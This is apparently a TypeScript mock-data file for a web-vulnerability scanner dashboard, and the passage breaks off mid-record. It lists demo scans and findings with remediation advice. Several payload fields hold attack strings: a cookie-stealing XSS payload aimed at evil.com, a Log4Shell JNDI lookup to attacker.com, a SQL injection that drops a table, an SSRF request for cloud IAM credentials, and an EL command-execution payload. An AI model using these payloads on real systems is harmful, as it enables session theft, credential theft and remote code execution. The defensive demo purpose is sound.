import type { DastScan, DastFinding } from '@/lib/types'

export const MOCK_DAST_SCANS: DastScan[] = [
  {
    id: 'dast-scan-001',
    orgId: 'org-demo',
    name: 'Production Web App',
    targetUrl: 'https://app.example.com',
    scanProfile: 'full',
    status: 'COMPLETED',
    progress: 100,
    currentPhase: 'complete',
    riskScore: 72,
    endpointsDiscovered: 147,
    endpointsTested: 142,
    payloadsSent: 3840,
    criticalCount: 2,
    highCount: 4,
    mediumCount: 5,
    lowCount: 2,
    infoCount: 1,
    executiveSummary: '## Security Posture Overview\n\nThe production web application assessment revealed a **HIGH risk** security posture with a risk score of 72/100. Two critical vulnerabilities require immediate attention.\n\n## Critical Risk Areas\n\n1. **SQL Injection** — Full database compromise risk\n2. **Reflected XSS** — Session hijacking risk\n3. **Missing Security Headers** — Attack surface expansion\n\n## Recommended Actions\n\n- **Immediate (0-48 hrs)**: Patch SQL injection, fix XSS\n- **Short-term (1-2 weeks)**: Add security headers, fix CSRF\n- **Medium-term (1-3 months)**: Full security header audit',
    aiCorrelationData: JSON.stringify({
      attackChains: [
        { chainId: 'chain-1', name: 'XSS + CSRF = Account Takeover', description: 'Reflected XSS chained with CSRF on account settings enables full account takeover.', severity: 'CRITICAL', findingIndices: [1, 5], exploitationSteps: ['Craft XSS payload targeting CSRF endpoint', 'Embed in phishing link', 'Victim clicks and XSS changes their email', 'Attacker resets password'], businessImpact: 'Complete account takeover', likelihoodOfExploitation: 'HIGH' },
        { chainId: 'chain-2', name: 'SQLi + Data Leak = Full Breach', description: 'SQL injection combined with sensitive data API enables enriched data exfiltration.', severity: 'CRITICAL', findingIndices: [0, 4], exploitationSteps: ['Extract password hashes via SQLi', 'Cross-reference with /api/users data', 'Crack hashes offline', 'Access accounts'], businessImpact: 'Full database compromise', likelihoodOfExploitation: 'VERY_HIGH' },
      ],
      duplicateGroups: [],
      riskAmplifiers: [{ description: 'Missing CSP/HSTS amplifies XSS impact', affectedFindings: [1, 3], amplificationFactor: 1.5 }],
      overallChainedRiskScore: 85,
    }),
    aiComplianceData: JSON.stringify({
      frameworks: [
        { name: 'PCI DSS 4.0', overallStatus: 'CRITICAL_GAPS', controlsAffected: 5, totalControlsChecked: 12, affectedControls: [
          { framework: 'PCI DSS 4.0', controlId: '6.2.4', controlName: 'Injection prevention', status: 'FAIL', findingIndices: [0], remediationNote: 'Use parameterized queries' },
          { framework: 'PCI DSS 4.0', controlId: '6.2.4.3', controlName: 'XSS prevention', status: 'FAIL', findingIndices: [1], remediationNote: 'Output encoding' },
        ]},
        { name: 'SOC 2 Type II', overallStatus: 'SIGNIFICANT_GAPS', controlsAffected: 4, totalControlsChecked: 8, affectedControls: [] },
      ],
      highestRiskFramework: 'PCI DSS 4.0',
      complianceScore: 42,
      auditReadiness: 'NOT_READY',
      keyGaps: ['Injection prevention failing', 'Missing security headers', 'No CSRF protection'],
    }),
    techStackDetected: ['Next.js', 'nginx', 'React'],
    reportUrl: null,
    startedAt: '2026-03-12T08:00:00Z',
    completedAt: '2026-03-12T09:23:00Z',
    createdAt: '2026-03-12T07:58:00Z',
  },
  {
    id: 'dast-scan-002',
    orgId: 'org-demo',
    name: 'Staging API',
    targetUrl: 'https://api-staging.example.com',
    scanProfile: 'api_only',
    status: 'COMPLETED',
    progress: 100,
    currentPhase: 'complete',
    riskScore: 45,
    endpointsDiscovered: 63,
    endpointsTested: 63,
    payloadsSent: 1890,
    criticalCount: 0,
    highCount: 2,
    mediumCount: 3,
    lowCount: 4,
    infoCount: 2,
    executiveSummary: 'API scan completed with no critical findings. Two high-severity issues found in authentication endpoints.',
    aiCorrelationData: null,
    aiComplianceData: null,
    techStackDetected: ['Express.js', 'nginx'],
    reportUrl: null,
    startedAt: '2026-03-11T14:00:00Z',
    completedAt: '2026-03-11T14:42:00Z',
    createdAt: '2026-03-11T13:58:00Z',
  },
  {
    id: 'dast-scan-003',
    orgId: 'org-demo',
    name: 'Deep Scan — Payment Portal',
    targetUrl: 'https://payments.example.com',
    scanProfile: 'deep',
    status: 'COMPLETED',
    progress: 100,
    currentPhase: 'complete',
    riskScore: 88,
    endpointsDiscovered: 312,
    endpointsTested: 308,
    payloadsSent: 14720,
    criticalCount: 4,
    highCount: 7,
    mediumCount: 8,
    lowCount: 5,
    infoCount: 3,
    executiveSummary: '## Security Posture Overview\n\nThe deep scan of the payment portal revealed a **CRITICAL** security posture (88/100 risk score). Four critical vulnerabilities including Log4Shell require immediate remediation.\n\n## Critical Risk Areas\n\n1. **Log4Shell (CVE-2021-44228)** — Remote code execution via JNDI injection\n2. **SSTI** — Server-side template injection enabling RCE\n3. **Cloud Metadata SSRF** — AWS IAM credential exposure\n4. **EL Injection** — Expression language code execution\n\n## Compliance Impact\n\nPCI DSS: 8 control failures. SOC 2: 6 criteria affected. This application is **not audit-ready**.',
    aiCorrelationData: JSON.stringify({
      attackChains: [
        { chainId: 'chain-1', name: 'SSRF + Cloud Metadata = AWS Takeover', description: 'SSRF vulnerability chains with cloud metadata access to exfiltrate IAM credentials and compromise the entire AWS account.', severity: 'CRITICAL', findingIndices: [2, 4], exploitationSteps: ['Exploit SSRF to reach metadata endpoint', 'Extract IAM role credentials', 'Use credentials to access S3/RDS', 'Pivot to other AWS services'], businessImpact: 'Full cloud infrastructure compromise', likelihoodOfExploitation: 'VERY_HIGH' },
      ],
      duplicateGroups: [],
      riskAmplifiers: [{ description: 'Spring Actuator exposure amplifies all findings by revealing internal configuration', affectedFindings: [0, 1, 2, 3, 4], amplificationFactor: 1.3 }],
      overallChainedRiskScore: 95,
    }),
    aiComplianceData: JSON.stringify({
      frameworks: [
        { name: 'PCI DSS 4.0', overallStatus: 'CRITICAL_GAPS', controlsAffected: 8, totalControlsChecked: 12, affectedControls: [] },
      ],
      highestRiskFramework: 'PCI DSS 4.0',
      complianceScore: 18,
      auditReadiness: 'NOT_READY',
      keyGaps: ['Critical RCE vulnerabilities', 'Cloud credential exposure', 'Backup file disclosure'],
    }),
    techStackDetected: ['Java', 'Spring Boot', 'nginx', 'AWS'],
    reportUrl: null,
    startedAt: '2026-03-14T02:00:00Z',
    completedAt: '2026-03-14T04:47:00Z',
    createdAt: '2026-03-14T01:55:00Z',
  },
]

export const MOCK_DAST_FINDINGS: DastFinding[] = [
  {
    id: 'dast-f-001',
    scanId: 'dast-scan-001',
    type: 'sql-injection',
    owaspCategory: 'A03:2021 Injection',
    cweId: 'CWE-89',
    severity: 'CRITICAL',
    cvssScore: 9.8,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
    riskScore: 98,
    title: 'SQL Injection in Search Parameter',
    description: 'The search parameter on /api/products is vulnerable to SQL injection. An attacker can extract, modify, or delete data from the database.',
    businessImpact: 'Full database compromise. Customer PII, payment data, and authentication credentials may be exfiltrated.',
    affectedUrl: 'https://app.example.com/api/products?search=test',
    affectedParameter: 'search',
    payload: "' OR 1=1; DROP TABLE users--",
    remediation: 'Use parameterized queries or prepared statements. Never concatenate user input into SQL queries.',
    remediationCode: JSON.stringify({
      vulnerableCode: "const query = `SELECT * FROM products WHERE name LIKE '%${search}%'`",
      remediatedCode: "const query = 'SELECT * FROM products WHERE name LIKE $1'\nconst params = [`%${search}%`]",
      explanation: 'Replace string interpolation with parameterized query to prevent SQL injection.',
      language: 'JavaScript',
      framework: 'Node.js / PostgreSQL',
      configurationFix: '# WAF Rule: Block common SQLi patterns\nSecRule ARGS "@detectSQLi" "id:1,phase:2,deny,status:403"',
      securityHeaders: ['Content-Security-Policy: default-src \'self\''],
      wafRule: 'SecRule ARGS "@detectSQLi" "id:942100,phase:2,block,msg:\'SQL Injection Attack\'"',
    }),
    aiEnrichmentData: JSON.stringify({
      attackScenario: '1. Attacker discovers search parameter accepts SQL syntax. 2. Crafts UNION-based injection to extract table names. 3. Dumps users table with password hashes. 4. Cracks hashes offline and logs into admin accounts.',
      falsePositiveLikelihood: 'LOW',
      falsePositiveReason: 'Response time differential and error-based evidence confirm SQL execution.',
      priorityScore: 98,
      priorityReason: 'Unauthenticated RCE-equivalent on a public-facing endpoint with PII in the database.',
      relatedCwes: ['CWE-89', 'CWE-564', 'CWE-943'],
      mitigationUrgency: 'IMMEDIATE',
      technicalDetail: 'The search parameter is concatenated into a PostgreSQL query without parameterization, allowing UNION-based and time-based blind injection.',
      exploitDifficulty: 'LOW',
      dataAtRisk: ['Customer PII', 'Payment card data', 'Authentication credentials', 'Internal business data'],
      complianceImplications: ['PCI DSS 4.0 Req 6.2.4 — Injection prevention', 'GDPR Art 32 — Security of processing', 'SOC 2 CC6.1 — Logical access'],
    }),
    pciDssRefs: ['6.5.1'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1190'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-002',
    scanId: 'dast-scan-001',
    type: 'xss-reflected',
    owaspCategory: 'A03:2021 Injection',
    cweId: 'CWE-79',
    severity: 'CRITICAL',
    cvssScore: 9.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N',
    riskScore: 92,
    title: 'Reflected XSS in Error Page',
    description: 'The error parameter is reflected in the page without proper encoding, allowing script injection.',
    businessImpact: 'Session hijacking, credential theft, phishing attacks targeting authenticated users.',
    affectedUrl: 'https://app.example.com/error?msg=test',
    affectedParameter: 'msg',
    payload: '<script>document.location="https://evil.com/steal?c="+document.cookie</script>',
    remediation: 'HTML-encode all user-supplied data before rendering in the page. Implement Content-Security-Policy headers.',
    remediationCode: JSON.stringify({
      vulnerableCode: '<div>{errorMessage}</div>',
      remediatedCode: '<div>{DOMPurify.sanitize(errorMessage)}</div>',
      explanation: 'Sanitize user input before rendering to prevent XSS.',
    }),
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.7'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1059.007'],
    confidenceScore: 90,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-003',
    scanId: 'dast-scan-001',
    type: 'broken-auth',
    owaspCategory: 'A07:2021 Auth Failures',
    cweId: 'CWE-287',
    severity: 'HIGH',
    cvssScore: 8.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N',
    riskScore: 85,
    title: 'No Rate Limiting on Login Endpoint',
    description: 'The /api/auth/login endpoint accepts unlimited authentication attempts without rate limiting or account lockout.',
    businessImpact: 'Enables brute force and credential stuffing attacks against user accounts.',
    affectedUrl: 'https://app.example.com/api/auth/login',
    affectedParameter: null,
    payload: null,
    remediation: 'Implement rate limiting (e.g., 5 attempts per minute). Add progressive delays and account lockout after repeated failures.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['8.1.6'],
    soc2Refs: ['CC6.1', 'CC6.2'],
    mitreAttackIds: ['T1110'],
    confidenceScore: 88,
    status: 'OPEN',
    isConfirmed: false,
  },
  {
    id: 'dast-f-004',
    scanId: 'dast-scan-001',
    type: 'security-misconfiguration',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-693',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N',
    riskScore: 78,
    title: 'Missing Security Headers',
    description: 'Multiple security headers are missing: Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Strict-Transport-Security.',
    businessImpact: 'Increases risk of clickjacking, MIME-sniffing, and man-in-the-middle attacks.',
    affectedUrl: 'https://app.example.com/',
    affectedParameter: null,
    payload: null,
    remediation: 'Add security headers: CSP, X-Frame-Options: DENY, X-Content-Type-Options: nosniff, HSTS with max-age >= 31536000.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.10'],
    soc2Refs: ['CC6.6'],
    mitreAttackIds: ['T1557'],
    confidenceScore: 98,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-005',
    scanId: 'dast-scan-001',
    type: 'sensitive-data',
    owaspCategory: 'A02:2021 Cryptographic Failures',
    cweId: 'CWE-200',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N',
    riskScore: 76,
    title: 'Sensitive Data in API Response',
    description: 'The /api/users endpoint returns password hashes, internal IDs, and email addresses in the response body.',
    businessImpact: 'Leaks sensitive user data that can be used for account takeover or identity theft.',
    affectedUrl: 'https://app.example.com/api/users',
    affectedParameter: null,
    payload: null,
    remediation: 'Filter sensitive fields from API responses. Use DTOs to control which fields are exposed.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['3.4', '6.5.3'],
    soc2Refs: ['CC6.1', 'CC6.5'],
    mitreAttackIds: ['T1530'],
    confidenceScore: 85,
    status: 'OPEN',
    isConfirmed: false,
  },
  {
    id: 'dast-f-006',
    scanId: 'dast-scan-001',
    type: 'csrf',
    owaspCategory: 'A01:2021 Broken Access Control',
    cweId: 'CWE-352',
    severity: 'HIGH',
    cvssScore: 7.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L',
    riskScore: 72,
    title: 'CSRF on Account Settings',
    description: 'The account settings form at /settings/profile lacks CSRF protection. State-changing requests can be forged.',
    businessImpact: 'Attackers can change user email, password, or other settings via forged requests.',
    affectedUrl: 'https://app.example.com/settings/profile',
    affectedParameter: null,
    payload: null,
    remediation: 'Implement CSRF tokens on all state-changing forms and verify them server-side.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.9'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1185'],
    confidenceScore: 82,
    status: 'OPEN',
    isConfirmed: false,
  },
  {
    id: 'dast-f-007',
    scanId: 'dast-scan-001',
    type: 'information-disclosure',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-200',
    severity: 'MEDIUM',
    cvssScore: 5.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 52,
    title: 'Server Version Disclosed in Headers',
    description: 'The Server header reveals the web server version: nginx/1.24.0. This helps attackers identify known vulnerabilities.',
    businessImpact: 'Aids reconnaissance for targeted attacks against known server vulnerabilities.',
    affectedUrl: 'https://app.example.com/',
    affectedParameter: null,
    payload: null,
    remediation: 'Remove or obfuscate the Server header. Configure nginx with server_tokens off.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: ['T1592'],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-008',
    scanId: 'dast-scan-001',
    type: 'cookie-security',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-614',
    severity: 'MEDIUM',
    cvssScore: 5.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N',
    riskScore: 48,
    title: 'Session Cookie Missing Secure Flag',
    description: 'The session cookie "sid" is set without the Secure flag, allowing transmission over unencrypted HTTP connections.',
    businessImpact: 'Session tokens may be intercepted over insecure connections, enabling session hijacking.',
    affectedUrl: 'https://app.example.com/api/auth/login',
    affectedParameter: null,
    payload: null,
    remediation: 'Set the Secure and HttpOnly flags on all session cookies. Add SameSite=Strict attribute.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.10'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1539'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-009',
    scanId: 'dast-scan-001',
    type: 'directory-listing',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-548',
    severity: 'MEDIUM',
    cvssScore: 5.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 45,
    title: 'Directory Listing Enabled',
    description: 'Directory listing is enabled on /static/uploads/, exposing uploaded file names and structure.',
    businessImpact: 'May expose sensitive file names, internal naming conventions, or uploaded user content.',
    affectedUrl: 'https://app.example.com/static/uploads/',
    affectedParameter: null,
    payload: null,
    remediation: 'Disable directory listing in the web server configuration. Add index files or return 403.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: ['T1083'],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-010',
    scanId: 'dast-scan-001',
    type: 'cors-misconfiguration',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-942',
    severity: 'MEDIUM',
    cvssScore: 4.7,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N',
    riskScore: 42,
    title: 'Overly Permissive CORS Policy',
    description: 'The API responds with Access-Control-Allow-Origin: * on authenticated endpoints, allowing any origin to make cross-origin requests.',
    businessImpact: 'Enables cross-origin data theft from authenticated user sessions.',
    affectedUrl: 'https://app.example.com/api/users/me',
    affectedParameter: null,
    payload: null,
    remediation: 'Configure CORS to allow only trusted origins. Never use wildcard with credentials.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: ['CC6.6'],
    mitreAttackIds: ['T1185'],
    confidenceScore: 90,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-011',
    scanId: 'dast-scan-001',
    type: 'tls-weakness',
    owaspCategory: 'A02:2021 Cryptographic Failures',
    cweId: 'CWE-326',
    severity: 'MEDIUM',
    cvssScore: 4.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N',
    riskScore: 38,
    title: 'Weak TLS Cipher Suites Supported',
    description: 'The server supports TLS_RSA_WITH_AES_128_CBC_SHA which is considered weak.',
    businessImpact: 'May allow decryption of traffic by sophisticated attackers.',
    affectedUrl: 'https://app.example.com/',
    affectedParameter: null,
    payload: null,
    remediation: 'Disable weak cipher suites. Only allow TLS 1.2+ with AEAD cipher suites.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['4.1'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1557'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-012',
    scanId: 'dast-scan-001',
    type: 'verbose-error',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-209',
    severity: 'LOW',
    cvssScore: 3.7,
    cvssVector: 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 28,
    title: 'Verbose Error Messages',
    description: 'Stack traces and internal paths are returned in error responses (e.g., /api/products/invalid).',
    businessImpact: 'Reveals internal architecture details useful for further attacks.',
    affectedUrl: 'https://app.example.com/api/products/invalid',
    affectedParameter: null,
    payload: null,
    remediation: 'Return generic error messages to clients. Log detailed errors server-side only.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: ['T1592'],
    confidenceScore: 92,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-013',
    scanId: 'dast-scan-001',
    type: 'autocomplete',
    owaspCategory: 'A04:2021 Insecure Design',
    cweId: 'CWE-524',
    severity: 'LOW',
    cvssScore: 2.4,
    cvssVector: 'CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 15,
    title: 'Password Field Autocomplete Enabled',
    description: 'The login form password field has autocomplete enabled, allowing browsers to cache credentials.',
    businessImpact: 'Cached credentials on shared devices may be accessed by other users.',
    affectedUrl: 'https://app.example.com/login',
    affectedParameter: 'password',
    payload: null,
    remediation: 'Add autocomplete="off" to password input fields on sensitive forms.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: [],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-014',
    scanId: 'dast-scan-001',
    type: 'info-disclosure',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: null,
    severity: 'INFO',
    cvssScore: null,
    cvssVector: null,
    riskScore: 5,
    title: 'Application Fingerprinting',
    description: 'The application can be identified as Next.js based on response headers and JavaScript bundle patterns.',
    businessImpact: 'Aids reconnaissance but poses minimal direct risk.',
    affectedUrl: 'https://app.example.com/',
    affectedParameter: null,
    payload: null,
    remediation: 'Consider removing X-Powered-By header. This is informational only.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: [],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  // ── Scan 002 findings ──
  {
    id: 'dast-f-015',
    scanId: 'dast-scan-002',
    type: 'broken-auth',
    owaspCategory: 'A07:2021 Auth Failures',
    cweId: 'CWE-306',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N',
    riskScore: 78,
    title: 'API Endpoint Missing Authentication',
    description: 'The /api/v2/internal/metrics endpoint is accessible without authentication and exposes internal system metrics.',
    businessImpact: 'Internal metrics may reveal system architecture, performance bottlenecks, and scaling information.',
    affectedUrl: 'https://api-staging.example.com/api/v2/internal/metrics',
    affectedParameter: null,
    payload: null,
    remediation: 'Add authentication middleware to all internal API endpoints.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['7.1'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1190'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-016',
    scanId: 'dast-scan-002',
    type: 'idor',
    owaspCategory: 'A01:2021 Broken Access Control',
    cweId: 'CWE-639',
    severity: 'HIGH',
    cvssScore: 7.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N',
    riskScore: 72,
    title: 'IDOR on User Profile Endpoint',
    description: 'The /api/v2/users/:id endpoint allows authenticated users to access other users\' profiles by changing the ID parameter.',
    businessImpact: 'Any authenticated user can access other users\' profile data including email and settings.',
    affectedUrl: 'https://api-staging.example.com/api/v2/users/123',
    affectedParameter: 'id',
    payload: null,
    remediation: 'Implement authorization checks to verify the requesting user owns the resource.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['7.1', '7.2'],
    soc2Refs: ['CC6.1', 'CC6.3'],
    mitreAttackIds: ['T1078'],
    confidenceScore: 80,
    status: 'OPEN',
    isConfirmed: false,
  },
  // ── Scan 003 findings (deep scan — new vulnerability types) ──
  {
    id: 'dast-f-017',
    scanId: 'dast-scan-003',
    type: 'log4shell',
    owaspCategory: 'A06:2021 Vulnerable Components',
    cweId: 'CWE-117',
    severity: 'CRITICAL',
    cvssScore: 10.0,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H',
    riskScore: 100,
    title: 'Log4Shell (CVE-2021-44228) — Remote Code Execution',
    description: 'The application uses a vulnerable version of Log4j that allows remote code execution via JNDI lookup injection in user-controlled input fields.',
    businessImpact: 'Full server compromise. Attacker can execute arbitrary commands, exfiltrate data, install backdoors, and pivot to internal systems.',
    affectedUrl: 'https://payments.example.com/api/checkout',
    affectedParameter: 'User-Agent',
    payload: '${jndi:ldap://attacker.com/exploit}',
    remediation: 'Upgrade Log4j to version 2.17.1 or later. As a mitigation, set log4j2.formatMsgNoLookups=true or remove the JndiLookup class.',
    remediationCode: JSON.stringify({
      vulnerableCode: '// pom.xml\n<dependency>\n  <groupId>org.apache.logging.log4j</groupId>\n  <artifactId>log4j-core</artifactId>\n  <version>2.14.1</version>\n</dependency>',
      remediatedCode: '// pom.xml\n<dependency>\n  <groupId>org.apache.logging.log4j</groupId>\n  <artifactId>log4j-core</artifactId>\n  <version>2.17.1</version>\n</dependency>',
      explanation: 'Upgrade Log4j to a patched version that disables JNDI lookups by default.',
    }),
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.1', '6.2'],
    soc2Refs: ['CC6.6', 'CC7.1'],
    mitreAttackIds: ['T1190', 'T1059'],
    confidenceScore: 98,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-018',
    scanId: 'dast-scan-003',
    type: 'ssti',
    owaspCategory: 'A03:2021 Injection',
    cweId: 'CWE-1336',
    severity: 'CRITICAL',
    cvssScore: 9.8,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
    riskScore: 98,
    title: 'Server-Side Template Injection (SSTI)',
    description: 'The /api/render endpoint processes user input through a template engine without sanitization. An attacker can inject template directives to achieve remote code execution.',
    businessImpact: 'Remote code execution on the server. Full system compromise, data exfiltration, and lateral movement.',
    affectedUrl: 'https://payments.example.com/api/render',
    affectedParameter: 'template',
    payload: '{{7*7}}',
    remediation: 'Never pass user input directly to template engines. Use sandboxed rendering or logic-less templates.',
    remediationCode: JSON.stringify({
      vulnerableCode: 'const output = nunjucks.renderString(req.body.template, data)',
      remediatedCode: 'const output = nunjucks.render("receipt.html", { ...data, userMessage: sanitize(req.body.message) })',
      explanation: 'Use pre-defined templates instead of rendering user-controlled template strings.',
    }),
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.1'],
    soc2Refs: ['CC6.6'],
    mitreAttackIds: ['T1059'],
    confidenceScore: 92,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-019',
    scanId: 'dast-scan-003',
    type: 'cloud_metadata',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-918',
    severity: 'CRITICAL',
    cvssScore: 9.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N',
    riskScore: 95,
    title: 'Cloud Metadata Endpoint Accessible via SSRF',
    description: 'The application is vulnerable to SSRF that allows access to the cloud provider metadata endpoint (169.254.169.254), exposing IAM credentials and instance configuration.',
    businessImpact: 'Cloud IAM credentials leaked. Attacker can assume the instance role and access S3 buckets, databases, and other cloud resources.',
    affectedUrl: 'https://payments.example.com/api/proxy',
    affectedParameter: 'url',
    payload: 'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
    remediation: 'Block requests to internal IP ranges (169.254.0.0/16, 10.0.0.0/8, etc.). Use IMDSv2 with hop limit 1.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.1'],
    soc2Refs: ['CC6.6'],
    mitreAttackIds: ['T1552.005', 'T1190'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-020',
    scanId: 'dast-scan-003',
    type: 'expression_language_injection',
    owaspCategory: 'A03:2021 Injection',
    cweId: 'CWE-917',
    severity: 'CRITICAL',
    cvssScore: 9.8,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
    riskScore: 98,
    title: 'Expression Language Injection',
    description: 'User input is evaluated as an Expression Language (EL) expression in the search functionality, enabling arbitrary code execution.',
    businessImpact: 'Remote code execution. Attacker can access the full Java runtime, read files, and execute system commands.',
    affectedUrl: 'https://payments.example.com/search',
    affectedParameter: 'q',
    payload: '${Runtime.getRuntime().exec("id")}',
    remediation: 'Never evaluate user input as EL expressions. Use parameterized queries and template rendering.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.1'],
    soc2Refs: ['CC6.6'],
    mitreAttackIds: ['T1059'],
    confidenceScore: 88,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-021',
    scanId: 'dast-scan-003',
    type: 'spring_actuator',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-215',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N',
    riskScore: 78,
    title: 'Spring Boot Actuator Endpoints Exposed',
    description: 'Spring Boot Actuator endpoints (/actuator/env, /actuator/heapdump, /actuator/configprops) are publicly accessible without authentication.',
    businessImpact: 'Environment variables (including database credentials, API keys), heap dumps (memory contents), and application configuration are exposed.',
    affectedUrl: 'https://payments.example.com/actuator/env',
    affectedParameter: null,
    payload: null,
    remediation: 'Secure Actuator endpoints behind authentication. Disable sensitive endpoints in production or restrict to internal network only.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: [],
    soc2Refs: ['CC7.1'],
    mitreAttackIds: ['T1190'],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-022',
    scanId: 'dast-scan-003',
    type: 'session_fixation',
    owaspCategory: 'A07:2021 Auth Failures',
    cweId: 'CWE-384',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N',
    riskScore: 75,
    title: 'Session Fixation Vulnerability',
    description: 'The application does not regenerate the session ID after authentication. An attacker can fixate a session ID and hijack the user session after login.',
    businessImpact: 'Account takeover. Attacker can access the victim\'s authenticated session and perform actions on their behalf.',
    affectedUrl: 'https://payments.example.com/login',
    affectedParameter: null,
    payload: null,
    remediation: 'Regenerate session ID after successful authentication. Invalidate old session tokens.',
    remediationCode: null,
    aiEnrichmentData: null,
    pciDssRefs: ['6.5.10'],
    soc2Refs: ['CC6.1'],
